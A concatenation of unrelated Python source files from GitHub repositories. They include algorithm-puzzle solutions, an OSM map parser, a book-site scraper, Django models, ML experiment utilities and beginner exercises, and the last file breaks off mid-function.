def members(self,x):\n        root = self.find(x)\n        ret = [ i for i in range(self.n) if self.find(i) == root ]\n        return ret\n\n    def roots(self):\n        ret = [ i for i in range(self.n) if self.parents[i] < 0]\n        return ret\n\n    def group_count(self):\n        return len(self.roots())\n\n    def all_group_members(self):\n        return {r: self.members(r) for r in self.roots()}\n\nn,m = map(int,readline().split())\nabct = list(map(int,read().split()))\n\nit = iter(abct)\nroad = [(a,b,c,t) for a,b,c,t in zip(it,it,it,it)]\n\nng = 0\nok = 10**6\nfor _ in range(30):\n    mid = (ng+ok)/2\n    uf = UnionFind(n)\n    road.sort(key=lambda x:x[2] - mid*x[3])\n\n    cost = 0\n    for a,b,c,t in road:\n        c_tmp = c - t*mid\n        if(uf.same(a,b))&(c_tmp > 0):\n            continue\n        cost += c_tmp\n        uf.union(a,b)\n\n    if(cost < 0):\n        ok = mid\n    else:\n        ng = 
mid\n\nprint(ok)\n\n\n\n'''\nFix an hourly wage and run a binary search over it.\n\n\n\n'''\n","repo_name":"komajun365/competitive_programming","sub_path":"arc/arc026/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35645460318","text":"'''\nGiven a number n, return the value at index n of the Fibonacci sequence, where the sequence is:\n\n0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, ...\nthe pattern of the sequence is that each value is the sum of the two previous values, that means that for N=5 -> 2+3\n\n'''\n\n\ndef fibonacciIterative(n):\n    F = [0, 1]\n    for idx in range(n):\n        F[0], F[1] = F[1], F[0] + F[1]\n    return F[0]\n\n\ndef fibonacciRecursive(n):\n    '''\n    let's say n = 4\n    fibonacciRecursive(fibonacciRecursive(fibonacciRecursive(4)))\n\n    1. n=4 : fibonacciRecursive(fibonacciRecursive(f(3) + f(2))\n    2. n=3 : fibonacciRecursive(f(2) + f(1))\n    3. n=2 : 1\n\n    '''\n    if n <= 2:\n        return 1\n    return fibonacciRecursive(n-1) + fibonacciRecursive(n-2)\n\n\nprint(fibonacciIterative(8))\nprint(fibonacciRecursive(8))\n","repo_name":"ta-brook/DS-and-Algorithm","sub_path":"Algorithm/recursion/Fibonacci.py","file_name":"Fibonacci.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10167286681","text":"#!/usr/bin/env python\n# coding=utf-8\n\n########################################################################\n#FileName: parking_parser.py\n#Author : Christian Göller, Jonas Bäuml, Simon Berger, Elias Häring \n#Last Modified On : 09.06.2023\n#Description : Parser for osm file to retrieve waypoints \n########################################################################\n\n\n\nimport xml.etree.ElementTree as ET\nimport matplotlib.pyplot as plt\n\n\n# Function to parse an osm-file for the information relevant to us\n# In this case: Searching for points of street-lines and parking-lines \n# input: path to the osm-file as a string\n# output: list (total list of all ways) of lists (list of all points of a way) of dictionaries (point\n#         with x-, y- and z-coordinates) \n\n# Functionality:\n# 1. Search for all ways with the way types concerned\n# 2. Search for the ids of the points in the way\n# 3. 
search for ids, to get the coordinates of the points\n\ndef parse_osm(name):\n    tree = ET.parse(name)\n    root = tree.getroot()\n\n    points = []\n    ref = []\n    i = 0\n    # step 1\n    for way in root.findall(\"way\"):\n        type = \"\"\n        for tag in way.findall(\"tag\"):\n            if tag.attrib[\"k\"] == \"type\":\n                type = tag.attrib[\"v\"]\n        if type == \"parking_space\" or type == \"line_thin\":\n            ref.append([])\n            # step 2\n            for nd in way.findall(\"nd\"):\n                ref[i].append(nd.attrib[\"ref\"]) \n            i += 1\n    # step 3\n    lines = []\n    for re in ref:\n        lines.append([])\n        for r in re:\n            for node in root.findall(\"node\"):\n                point = {}\n                if r == node.attrib[\"id\"]:\n                    for tag in node.findall(\"tag\"):\n                        if tag.attrib[\"k\"] == \"local_x\":\n                            point[\"x\"] = tag.attrib[\"v\"]\n                        elif tag.attrib[\"k\"] == \"local_y\":\n                            point[\"y\"] = tag.attrib[\"v\"]\n                        elif tag.attrib[\"k\"] == \"local_z\":\n                            point[\"z\"] = tag.attrib[\"v\"]\n                    lines[len(lines) -1].append(point)\n    \n    \n    return lines\n","repo_name":"SimonBerger11/trajectory_planning","sub_path":"parking_parser.py","file_name":"parking_parser.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22685726226","text":"import time # import the time library\n\ndef countdown(t): # countdown function\n    print('Countdown: \\n')\n    while t: # while time 't' remains\n        mins, secs = divmod(t, 60) # split into minutes and seconds\n        timer = '{0}' ':' '{1}'.format(mins , secs) # formatting for the countdown display\n        print(timer, end=\"\\r\") # display the countdown\n        time.sleep(1) # interval\n        t -= 1 # count down\n    \n    print('Time is up!') # message when the time runs out\n    \nt = int(input('Enter the time in seconds:\\n')) # read the desired number of seconds\ncountdown(t) # call the function","repo_name":"0CMat/Projetos-Python","sub_path":"Contagem Regressiva/countdown-timer.py","file_name":"countdown-timer.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38131595939","text":"import collections\nimport math\nfrom typing import List\n\n\nclass Solution:\n    def subsets(self, nums: List[int]) -> List[List[int]]:\n        set_ans = set()\n\n        def backtracking(cur, idx):\n            if cur not in set_ans:\n                set_ans.add(cur)\n            if idx < len(nums):\n                backtracking(cur, idx + 1)\n                cur += str(nums[idx]) + ','\n                backtracking(cur, idx + 1)\n\n        backtracking('', 0)\n        ans = []\n        for i in set_ans:\n            tmp = i.split(',')\n            if tmp:\n                tmp.pop()\n            ans.append([int(i) for i in tmp])\n\n        return ans\n\n\nif __name__ == \"__main__\":\n    sol = Solution()\n    test_cases = [\n        [1, 2, 3],\n        [1],\n        [1, -2, 10],\n    ]\n    for i in test_cases:\n        print(sol.subsets(i))\n\n\n","repo_name":"chyt123/cosmos","sub_path":"coding_everyday/lc1-100/lc78/Subsets.py","file_name":"Subsets.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74222584808","text":"class Solution:\n    def tallestBillboard(self, rods: List[int]) -> int:\n        ans={}\n        \n        def rec(i,diff):\n            if (i,diff) in ans:\n                return ans[(i,diff)]\n            if i>=len(rods):\n                if diff:\n                    return -float('inf')\n                return 0\n            long=rec(i+1,diff+rods[i])\n            skip=rec(i+1,diff)\n            short=rec(i+1,diff-rods[i])+rods[i]\n            ans[(i,diff)]=max(long,skip,short)\n            return ans[(i,diff)]\n        return 
rec(0,0)","repo_name":"abhi-apple/leetcode","sub_path":"0956-tallest-billboard/0956-tallest-billboard.py","file_name":"0956-tallest-billboard.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20031223468","text":"import aiohttp\nimport asyncio\nimport json\nimport os\nimport time\n\nfrom bs4 import BeautifulSoup as bs\n\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\nPATH_TO_JSON_FILE_BOOK = os.path.join(BASE_DIR, \"data/book_data.json\")\nPATH_TO_JSON_FILE_AUTHOR = os.path.join(BASE_DIR, \"data/author_data.json\")\nBASE_URL = \"https://book24.ru\"\n\nON_WRITE = []\nON_WRITE_AUTHORS = []\n\n\ndef get_soup(html):\n soup = bs(html, 'html.parser')\n return soup\n\nasync def connect(url, session):\n async with session.get(url) as response:\n print(f\"Connect to {url}\")\n html = await response.text()\n return html\n\n\ndef write_data():\n print(f\"===== {len(ON_WRITE)} OBJECTS WRITED IN JSON FILE ======\")\n with open(f\"{PATH_TO_JSON_FILE_BOOK}\", \"w\") as file:\n json.dump(ON_WRITE, file, indent=2, ensure_ascii=False)\n\ndef write_data_author():\n print(f\"===== {len(ON_WRITE_AUTHORS)} OBJECTS WRITED IN JSON FILE ======\")\n with open(f\"{PATH_TO_JSON_FILE_AUTHOR}\", \"w\") as file:\n json.dump(ON_WRITE_AUTHORS, file, indent=2, ensure_ascii=False)\n\ndef get_book_name(soup):\n try:\n book_name = soup.select_one(\".item-detail__title\").text\n except:\n book_name = None\n\n return book_name\n\ndef get_book_description(soup):\n try:\n description = soup.select_one(\".collapse-panel__text.js-collapse-text .text-block-d\")\n except:\n description = None\n\n text = \"\"\n if description:\n for desc in description.select(\"p\"):\n text += desc.text + '\\n\\n'\n\n return text\n\ndef get_params(soup):\n try:\n params = soup.select(\".item-tab__chars-item\")\n except:\n params = None\n\n return params\n\ndef get_lable(param):\n try:\n lable = param.select_one(\".item-tab__chars-key\").text\n except:\n lable = None\n\n return lable\n\ndef get_author(param):\n try:\n author_name = param.select_one(\".item-tab__chars-value a\").text\n except:\n author_name = None\n\n if author_name:\n try:\n author_url = param.select_one(\".item-tab__chars-value a\")['href']\n except KeyError:\n author_url = param.select_one(\".item-tab__chars-value a\")['data-link']\n except:\n author_url = None\n\n return [{\"name\": author_name, \"url\": author_url}]\n return author_name\n\ndef get_genre(param):\n try:\n genre_name = param.select_one(\".item-tab__chars-value a\").text\n except:\n genre_name = None\n\n return genre_name\n\ndef get_author_and_genre(soup):\n params = get_params(soup)\n\n author_name = None\n genre_name = None\n\n if params:\n for param in params:\n lable = get_lable(param)\n if lable == \"Автор:\":\n author_name = get_author(param)\n if lable == \"Раздел:\":\n genre_name = get_genre(param)\n\n return author_name, genre_name\n\n\ndef get_book_image_url(soup):\n try:\n book_image_url = soup.select_one(\".item-cover__item:nth-child(1) img\")['src']\n except:\n book_image_url = None\n\n return book_image_url\n\nasync def pars_book(html):\n\n soup = get_soup(html)\n\n book_name = get_book_name(soup)\n description = get_book_description(soup)\n author_name, genre_name = get_author_and_genre(soup)\n book_image_url = get_book_image_url(soup)\n\n data = {\n \"author\": author_name,\n \"genre\": genre_name,\n \"book_name\": book_name,\n \"description\": description,\n \"image_url\": book_image_url\n 
}\n print(f\"# {book_name}....... ADDED FOR WRITE\")\n print(f\" Author: {data['author']}\")\n print(f\" Genre: {data['genre']}\")\n print(f\" Image Url: {data['image_url']}\")\n ON_WRITE.append(data)\n\n\nasync def get_data_books(soup):\n try:\n books = soup.select(\".book__image-link.js-item-element.ddl_product_link\")\n return books\n except Exception as e:\n raise Exception(\n \"# ERROR: This page is have not books!\"\n )\n\nasync def base_page():\n\n url = \"https://book24.ru/catalog/\"\n async with aiohttp.ClientSession() as session:\n html = await connect(url, session)\n soup = get_soup(html)\n\n books = soup.select(\".book__image-link.js-item-element.ddl_product_link\")\n\n return books\n\n\nasync def pars_catalog():\n\n books = await base_page()\n\n urls = []\n async with aiohttp.ClientSession() as session:\n for book in books:\n book_url = asyncio.create_task(connect(BASE_URL + book['href'], session))\n urls.append(book_url)\n\n htmls = await asyncio.gather(*urls)\n\n tasks = []\n for html in htmls:\n task = asyncio.create_task(pars_book(html))\n tasks.append(task)\n\n await asyncio.gather(*tasks)\n\n write_data()\n\ndef get_author_name(soup):\n try:\n author_name = soup.select_one(\".author-item__title\").text\n except:\n author_name = None\n\n return author_name\n\ndef get_author_description(soup):\n try:\n description = soup.select_one(\".text-block-d\").text.strip()\n except:\n description = None\n\n return description\n\ndef get_author_image_url(soup):\n try:\n author_image_url = soup.select_one(\".author-item__pic img\")['src']\n except:\n author_image_url = None\n\n return author_image_url\n\nasync def pars_author(html):\n soup = get_soup(html)\n\n author_name = get_author_name(soup)\n description = get_author_description(soup)\n author_image_url = get_author_image_url(soup)\n\n data = {\n \"name\": author_name,\n \"description\": description,\n \"image_url\": author_image_url\n }\n print(f\"# {author_name}....... 
ADDED FOR WRITE\")\n    print(f\" Image Url: {data['image_url']}\")\n    ON_WRITE_AUTHORS.append(data)\n\n\ndef get_authors_urls_from_book_data():\n    url_list = []\n    with open(f\"{PATH_TO_JSON_FILE_BOOK}\", \"r\") as file:\n        data = json.load(file)\n        for d in data:\n            if d['author'] and d['author'][0]['url']:\n                url_list.append(d['author'][0]['url'])\n    return url_list\n\nasync def pars_authors():\n\n    author_urls = get_authors_urls_from_book_data()\n\n    urls = []\n    async with aiohttp.ClientSession() as session:\n        for author_url in author_urls:\n            author_url = asyncio.create_task(connect(BASE_URL + author_url, session))\n            urls.append(author_url)\n\n        htmls = await asyncio.gather(*urls)\n\n    tasks = []\n    for html in htmls:\n        task = asyncio.create_task(pars_author(html))\n        tasks.append(task)\n\n    await asyncio.gather(*tasks)\n\n    write_data_author()\n\n\n\ndef main():\n\n    asyncio.run(pars_catalog())\n    asyncio.run(pars_authors())\n","repo_name":"MGDas/DjangoBook","sub_path":"app/scrap/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23365397873","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom snownlp import SnowNLP\n\ns = SnowNLP(u'这个东西真心很赞')\n\ns.words # [u'这个', u'东西', u'真心',\n# u'很', u'赞']\n\ns.tags # [(u'这个', u'r'), (u'东西', u'n'),\n# (u'真心', u'd'), (u'很', u'd'),\n# (u'赞', u'Vg')]\n\ns.sentiments # 0.9769663402895832 probability of being positive\n\ns.pinyin # [u'zhe', u'ge', u'dong', u'xi',\n# u'zhen', u'xin', u'hen', u'zan']\n\ns = SnowNLP(u'「繁體字」「繁體中文」的叫法在臺灣亦很常見。')\n","repo_name":"rogerjms/PyNLP","sub_path":"snowNLP.py","file_name":"snowNLP.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"fa","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16006346043","text":"from django.db import models\n\n# Create your models here.\n\n# the table name is the class name\nclass Grades(models.Model):\n    # if no primary key is specified, an auto-incrementing one is created automatically\n    # class attributes are table columns\n    gname = models.CharField(max_length=20)\n    gdate = models.DateField()\n    ggirlsum = models.IntegerField()\n    gboysum = models.IntegerField()\n    isDelete = models.BooleanField()\n    # def __str__(self):\n    #     return \"{}-{}-{}-{}-{}\".format(self.gname,self.gdate,self.ggirlsum,self.gboysum,self.isDelete)\n    def __str__(self):\n        return \"{}:{}\".format(self.gname,self.gdate)\n\nclass StudentsManager(models.Manager):\n    def get_queryset(self):\n        # override get_queryset() from the parent class so objects.all() comes pre-filtered\n        return super(StudentsManager,self).get_queryset().filter(isDelete=False)\n# create objects via a class method; cls is Students, see below. two approaches\n# this one is added in the manager\n    def createstudent(self,name,gender,age,contend,isD,grade):\n        stu = self.model()\n        stu.sname = name\n        stu.sgender = gender\n        stu.sage = age\n        stu.sconend = contend\n        stu.isDelete = isD\n        stu.sgrade = grade\n        return stu\n\n\nclass Students(models.Model):\n    # custom model managers\n    stuObj = models.Manager()\n    stuObj2 = StudentsManager()\n    sname = models.CharField(max_length=20)\n    sgender = models.BooleanField(default=True)\n    sage = models.IntegerField()\n    sconend = models.CharField(max_length=20)\n    isDelete = models.BooleanField(default=False)\n    # foreign key relation, must be specified, to avoid inconsistent data between the two tables\n    sgrade = models.ForeignKey(\"Grades\",on_delete=models.CASCADE)\n    def __str__(self):\n        return self.sname ,self.sage\n    # class Meta:\n    # define the table name; the default is: appname_tablename\n    #     db_table = 'students'\n    # table ordering: ascending ['id'], descending ['-id']\n    # ordering=['id']\n# time of last modification\n# models.DateTimeField(auto_now=True)\n# creation time\n# models.DateTimeField(auto_now_add=True)\n    # create objects via a class method; cls is Students\n    # the other one is added in the manager, see above. two approaches\n    @classmethod\n    def 
createStudent(cls,name,gender,age,contend,isD,grade):\n stu = cls(sname = name,sgender=gender,sage=age,sconend=contend,isDelete=isD,sgrade=grade)\n return stu\n\n\n \n\n\n\n","repo_name":"fclm1316/mydjango","sub_path":"myapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21051855242","text":"import z3\nimport json\nimport torch\nfrom Doping.pytorchtreelstm.treelstm import calculate_evaluation_orders\n# from Doping.PySpacerSolver.utils import *\nimport os\nimport numpy as np\nimport glob\nimport argparse\nimport sys\nimport matplotlib.pyplot as plt\nimport logging\n# def get_exp_name(prefix, exp_folder, vis, use_c, use_const_emb, use_dot_product, max_size, shuffle, negative_sampling_rate, threshold, dropout_rate):\ndef get_exp_name(configs, prefix = \"\"):\n '''\n construct a meaningful exp_name for the Tensorboard\n '''\n exp_name = [prefix]\n #exp_folder is in the form\n #\"PySpacerSolver/MEDIA/backward_encoded_split_on_relu.smt2_250220_13_04_22/ind_gen_files/\"\n # exp_name.append(exp_folder.split(\"/\")[-3])\n for k in configs:\n if k in [\"input_folders\", \"checkpoint\"]: #do not put those parameters to the model name\n continue\n else:\n exp_name.append(configs[k][2])\n if isinstance(configs[k][0], bool):\n exp_name.append(str(int(configs[k][0])))\n else:\n exp_name.append(str(configs[k][0]))\n\n return \"_\".join(exp_name)\n\ndef json_to_markdown(data):\n result = \"\"\n for key in data:\n result += \"### %s\\n\"%key\n result += \"```\\n\"\n result += \"%s\"%(str(data[key]).replace(\"\\n\", \"\\n\\n\"))\n result += \"\\n```\"\n result += \"\\n\"\n\n return result\n\ndef get_seed_file(seed_path):\n if seed_path is None:\n return None\n print(\"\\t\\tIn get seed file\")\n seed_files = glob.glob(seed_path+\"/pool_solver*.smt2\")\n if(len(seed_files)==0):\n return None\n seed_files = sorted(seed_files)\n print(seed_files)\n seed_file = seed_files[0]\n return seed_file\n\n\ndef display_example(filename, true_label, pred_label, value):\n label_texts = [\"SAME COLOR\", \"DIFFERENT COLOR\"]\n with open(filename, \"r\") as dp:\n datapoint = json.load(dp)\n label_in_file = datapoint[\"label\"]\n assert(label_in_file == true_label)\n\n C_tree = datapoint[\"C_tree\"]\n L_a_tree = datapoint[\"L_a_tree\"]\n L_b_tree = datapoint[\"L_b_tree\"]\n\n C_tree_expr = C_tree[\"children\"][0][\"expr\"]\n L_a_tree_expr = L_a_tree[\"children\"][0][\"expr\"]\n L_b_tree_expr = L_b_tree[\"children\"][0][\"expr\"]\n\n\n result = {}\n result[\"filename\"] = \"...\" + filename[-20:]\n result[\"C_tree_expr\"] = C_tree_expr\n result[\"L_a_tree_expr\"] = L_a_tree_expr\n result[\"L_b_tree_expr\"] = L_b_tree_expr\n result[\"value\"] = value\n result[\"pred_label\"] = label_texts[pred_label]\n result[\"true_label\"] = label_texts[label_in_file]\n\n #Tensorboard use markdown to render text\n return json_to_markdown(result)\n\ndef calculate_P(X, L, L_freq):\n idx2freq = {}\n for k in L:\n idx = L[k]\n freq = L_freq[k]\n\n idx2freq[idx] = freq\n print(len(X), len(L), len(L_freq))\n assert(len(X)==len(L)==len(L_freq))\n P_matrix = np.zeros((len(X), len(X)))\n for i in range(len(X)):\n for j in range(len(X)):\n #P_matrix[i][j] = P(lit_i|lit_j)\n P_matrix[i][j] = X[i][j]/idx2freq[j]\n assert(P_matrix[i][j]<=1 )\n\n return P_matrix\n\ndef visualize_X(filename, key):\n with open(filename, \"r\") as f:\n data = json.load(f)[key]\n fig, ax = plt.subplots()\n im = ax.imshow(data)\n 
ax.set_title(filename)\n ax.set_xticks(np.arange(.5, len(data), 10))\n ax.set_yticks(np.arange(.5, len(data), 10))\n ax.set_xticklabels(np.arange(1, len(data), 10))\n ax.set_yticklabels(np.arange(1, len(data), 10))\n ax.grid(color='w', linestyle='-', linewidth=1)\n plt.show()\n\ndef parser_from_template(json_config_template = \"/home/nle/workspace/Doping/exp_config_template.json\"):\n with open(json_config_template, \"r\") as f:\n config_template = json.load(f)\n parser = argparse.ArgumentParser()\n for key in config_template:\n if key==\"input_folders\":\n continue\n long_name = key\n short_name = config_template[key][2]\n arg_type = type(config_template[key][0])\n help_text = config_template[key][1]\n if arg_type==bool:\n parser.add_argument(\"-{}\".format(short_name),\n \"--{}\".format(long_name),\n default = None,\n help = help_text,\n action = 'store_true')\n else:\n parser.add_argument(\"-{}\".format(short_name),\n \"--{}\".format(long_name),\n default = None,\n type = arg_type,\n help = help_text)\n return parser\n\ndef plot_to_tensorboard(writer, fig, step):\n \"\"\"\n Takes a matplotlib figure handle and converts it using\n canvas and string-casts to a numpy array that can be\n visualized in TensorBoard using the add_image function\n\n Parameters:\n writer (tensorboard.SummaryWriter): TensorBoard SummaryWriter instance.\n fig (matplotlib.pyplot.fig): Matplotlib figure handle.\n step (int): counter usually specifying steps/epochs/time.\n \"\"\"\n\n # Draw figure on canvas\n fig.canvas.draw()\n\n # Convert the figure to numpy array, read the pixel values and reshape the array\n img = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')\n img = img.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n\n # Normalize into 0-1 range for TensorBoard(X). 
Swap axes for newer versions where API expects colors in first dim\n img = img / 255.0\n # img = np.swapaxes(img, 0, 2) # if your TensorFlow + TensorBoard version are >= 1.8\n\n # Add figure in numpy \"image\" to TensorBoard writer\n writer.add_image('confusion_matrix', img, step)\n plt.close(fig)\n\n\ndef create_logger(lvl, name, outstream = 'stderr'):\n logger = logging.getLogger(name)\n logger.setLevel(getattr(logging, lvl))\n formatter = logging.Formatter('%(name)s:%(levelname)s: %(message)s')\n if outstream == 'stderr':\n handler = logging.StreamHandler(sys.stderr)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n \n return logger\n","repo_name":"nhamlv-55/Ropey","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6165,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"73922097768","text":"# Given the root of a binary search tree, rearrange the tree in in-order so that the leftmost node in the tree is now the root of the tree, and every node has no left child and only one right child.\n\n\n# Example 1:\n\n\n# Input: root = [5, 3, 6, 2, 4, null, 8, 1, null, null, null, 7, 9]\n# Output: [1, null, 2, null, 3, null, 4, null,\n# 5, null, 6, null, 7, null, 8, null, 9]\n# Example 2:\n\n\n# Input: root = [5, 1, 7]\n# Output: [1, null, 5, null, 7]\n\n\n# Constraints:\n\n# The number of nodes in the given tree will be in the range[1, 100].\n# 0 <= Node.val <= 1000\n\nclass Solution:\n def increasingBST(self, root: TreeNode) -> TreeNode:\n dummy = TreeNode()\n self.current = dummy\n\n def dfs(root):\n if not root:\n return None\n dfs(root.left)\n root.left = None\n self.current.right = root\n self.current = root\n dfs(root.right)\n\n dfs(root)\n return dummy.right\n","repo_name":"jHuang30/Ds-and-Algo-in-Python","sub_path":"897. Increasing Order Search Tree.py","file_name":"897. 
Increasing Order Search Tree.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13516586849","text":"# 1. Write a function that checks whether a string is a palindrome, returning True or False\n# A palindrome reads the same from front to back and from back to front\n# e.g.: abba, abccba, aaa\ndef judge(content):\n    # return content == content[::-1]\n\n    # return content == ''.join(reversed(content))\n\n    reversed_content = ''\n    index = len(content) - 1\n    while index >= 0:\n        reversed_content += content[index]\n        index -= 1\n    return content == reversed_content\n\n\nprint(judge('abba'))\nprint()\n\ntest_cases = [\"abba\", \"abccba\", \"——aaa——\", \"JBbj\", \"JBA A BJ\", \"1221\", \"12aa 21\", \"2345\"]\nfor s in test_cases:\n    print(judge(s))\nprint()\n\n\n# 2. Write a function taking 1 string; for characters that occur repeatedly, keep only the first occurrence; return the stripped string\n# e.g.: abcdabce ——> abcde\ndef remove_repeat(content):\n    result = ''\n    for x in content:\n        if x not in result:\n            result += x\n    return result\n\n\nprint(remove_repeat('abcdabce'))\nprint()\n\n\n# 3. Write a function taking 1 string; delete all characters that occur repeatedly; return the stripped string\n# e.g.: abcdabce ——> de\ndef remove_repeat2(content):\n    result = ''\n    for x in content:\n        if content.count(x) == 1:\n            result += x\n    return result\n\n\ndef remove_repeat3(content):\n    result = ''\n\n    count_dict = {}\n    for x in content:\n        if x not in count_dict:\n            count_dict[x] = 1\n        else:\n            count_dict[x] += 1\n\n    for x in content:\n        if count_dict[x] == 1:\n            result += x\n\n    return result\n\n\nprint(remove_repeat2('abcdabce'))\nprint(remove_repeat3('abcdabce'))\nprint()\n\n\n# 4. Write a function taking a list of numbers and sort it by the numbers' absolute values; return the sorted list\n# e.g.: [1, -6, 2, -5, 9, 4, 20, -3] ——> [1, 2, -3, 4, -5, -6, 9, 20]\ndef rank_list(num_list):\n    # return sorted(num_list, key=lambda x: abs(x))\n    # return sorted(num_list, key=lambda x: x if x > 0 else 0 - x)\n\n    count_dict = {}\n    for num in num_list:\n        if num in count_dict:\n            count_dict[num] += 1\n        else:\n            count_dict[num] = 1\n\n    num_dict = {}\n    for num in num_list:\n        if num >= 0:\n            num_dict[num] = num\n        else:\n            num_dict[num] = 0 - num\n    dict_sorted = sorted(num_dict.items(), key=lambda x: x[1])\n    # return [item[0] for item in dict_sorted]\n\n    result = []\n    for item in dict_sorted:\n        value = item[0]\n        for i in range(0, count_dict[value]):\n            result.append(value)\n    return result\n\n\nprint(rank_list([1, -6, 2, -2, -5, -2, 9, 4, 20, -3]))\nprint()\n\n\n# 5. Write a function taking 2 dicts; merge the 2 dicts into 1 and return the merged dict\n# e.g.:\n# 1 {'a': 1, 'b': 2, 'c': 3}\n# 2 {'b': 1, 'c': 2, 'd': 3}\n# ——> {'a': 1, 'b': 3, 'c': 5, 'd': 3}\ndef merge_dict(dict1, dict2):\n    for key in dict2.keys():\n        if key in dict1:\n            dict1[key] += dict2[key]\n        else:\n            dict1[key] = dict2[key]\n    return dict1\n\n    # for key in dict1:\n    #     if key in dict2:\n    #         dict2[key] += dict1[key]\n    #     else:\n    #         dict2[key] = dict1[key]\n    # return dict2\n\n\ndict1 = {'a': 1, 'b': 2, 'c': 3}\nprint(merge_dict(dict1, {'b': 1, 'c': 2, 'd': 3}))\nprint()\n\n# dict1 = {'a': 1, 'b': 2, 'c': 3}\n# dict2 = {'b': 1, 'c': 2, 'd': 3}\n# dict3 = {}\n#\n# for key in set(dict1) | set(dict2):\n#     # use get to fetch the value for the key from dict1 & dict2; if the key is missing, return the default 0\n#     dict1_value = dict1.get(key,0)\n#     dict2_value = dict2.get(key,0)\n#     dict3[key] = dict1_value + dict2_value\n#\n# print(dict3)\n\n\n# # 6. Write a function taking a number as the row count and print an isosceles triangle made of '*'\n# # e.g., 4 rows\n# * 1 = 2 * 1 - 1, 3 = 4 - 1\n# *** 3 = 2 * 2 - 1, 2 = 4 - 2\n# ***** 5 = 2 * 3 - 1, 1 = 4 - 3\n# ******* 7 = 2 * 4 - 1, 0 = 4 - 4\ndef print_star_tree(line_num):\n    for i in range(1, line_num + 1):\n        star_num = 2 * i - 1\n        space_num = line_num - i\n\n        for j in range(0, space_num):\n            print(' ', end='')\n        for j in range(0, star_num):\n            
print('*', end='')\n print()\n\n\nprint_star_tree(4)\nprint()\n\n\n# 7、打印99乘法表\n# 1x1=1\n# 1x2=2 2x2=4\n# 1x3=3 2x3=6 3x3=9\n# 1x4=4 2x4=8 3x4=12 4x4=16\n# 1x5=5 2x5=10 3x5=15 4x5=20 5x5=25\n# 1x6=6 2x6=12 3x6=18 4x6=24 5x6=30 6x6=36\n# 1x7=7 2x7=14 3x7=21 4x7=28 5x7=35 6x7=42 7x7=49\n# 1x8=8 2x8=16 3x8=24 4x8=32 5x8=40 6x8=48 7x8=56 8x8=64\n# 1x9=9 2x9=18 3x9=27 4x9=36 5x9=45 6x9=54 7x9=63 8x9=72 9x9=81\ndef print_nine_nine():\n for i in range(1, 10):\n for j in range(1, i + 1):\n print(str(j) + \"x\" + str(i) + \"=\" + str(i * j) + ' ', end='')\n print()\n\n\nprint_nine_nine()\n","repo_name":"jwu12351/Python101","sub_path":"exam/exam1.py","file_name":"exam1.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5340762253","text":"import json\nimport logging\nimport random\nimport string\nimport subprocess\nimport time\nfrom collections import defaultdict\nfrom concurrent.futures import ThreadPoolExecutor\nfrom pathlib import Path\n\nfrom _autorun.install import is_installed\nfrom _autorun.util import confirm, get_faforever_dir\nfrom experiments import experiments\n\ntry:\n import pygetwindow as gw\nexcept ImportError:\n gw = None\n\nlog = logging.getLogger(__name__)\n\n\nfactions = {\n \"random\": 0,\n \"uef\": 1,\n \"aeon\": 2,\n \"cybran\": 3,\n \"seraphim\": 4,\n}\n\nimport os, multiprocessing, psutil\n\nclass Affinity:\n def __init__(self):\n self.cpus = {\n i: False for i in range(1,psutil.cpu_count())\n }\n self.pids = {}\n self.lock = multiprocessing.Lock()\n def start(self,pid):\n with self.lock:\n i = random.choice([x for x in self.cpus if not self.cpus[x]])\n self.cpus[i] = True\n self.pids[pid] = i\n psutil.Process(pid).cpu_affinity([i])\n def end(self,pid):\n with self.lock:\n i = self.pids[pid]\n del self.pids[pid]\n self.cpus[i] = False\n\nAFFINITY = Affinity()\n\ndef run_batch(args):\n start = time.time()\n faf_dir = get_faforever_dir()\n log_dir = Path.cwd() / \"logs\"\n\n if not args.obnoxious and gw is None:\n log.warning(\"Can't minimize windows because pygetwindow is not installed!\")\n return\n\n if not args.yes and not is_installed(faf_dir):\n if not confirm(\n \"Autorun does not appear to be installed, do you want to run the \"\n \"experiments anyway?\"\n ):\n log.debug(\"Cancelling...\")\n return\n\n if not log_dir.exists():\n log_dir.mkdir()\n\n if args.dry_run:\n print(len(experiments))\n print(ai_test_arg(experiments[0].ais))\n exit()\n\n futures = []\n with ThreadPoolExecutor(max_workers=args.num_threads if not args.use_affinity else min(psutil.cpu_count(),args.num_threads)) as executor:\n for experiment in experiments:\n fut = executor.submit(\n 